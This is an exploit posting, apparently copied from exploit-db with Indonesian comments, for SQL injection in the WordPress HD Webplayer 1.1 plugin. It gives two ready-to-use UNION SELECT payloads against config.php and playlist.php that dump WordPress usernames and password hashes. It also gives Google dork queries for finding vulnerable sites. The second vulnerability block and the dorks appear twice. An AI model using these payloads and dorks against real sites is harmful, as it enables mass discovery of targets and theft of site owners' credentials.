# Exploit Title: Wordpress HD Webplayer 1.1 SQL Injection
# Vendor Homepage: http://www.hdwebplayer.com/
# Software Link: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
# Version: version 1.1
# Tested on: Windows 7
[+]Vulnerability 1 - config.php
# Location :
http://site.com/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]
# Exploit :
config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users // Jumlah kolom mungkin berbeda
[+]Vulnerability 2 - playlist.php
# Location:
http://site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]
# Exploit Code:
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users // Jumlah kolom mungkin berbeda
Google Dork
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Sumber
Exploit-db:http://www.exploit-db.com/exploits/20918/
[+]Vulnerability 2 - playlist.php
# Location:
http://site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]
# Exploit Code:
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users // Jumlah kolom mungkin berbeda
Google Dork
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Sumber
Exploit-db:http://www.exploit-db.com/exploits/20918/
Advertisement
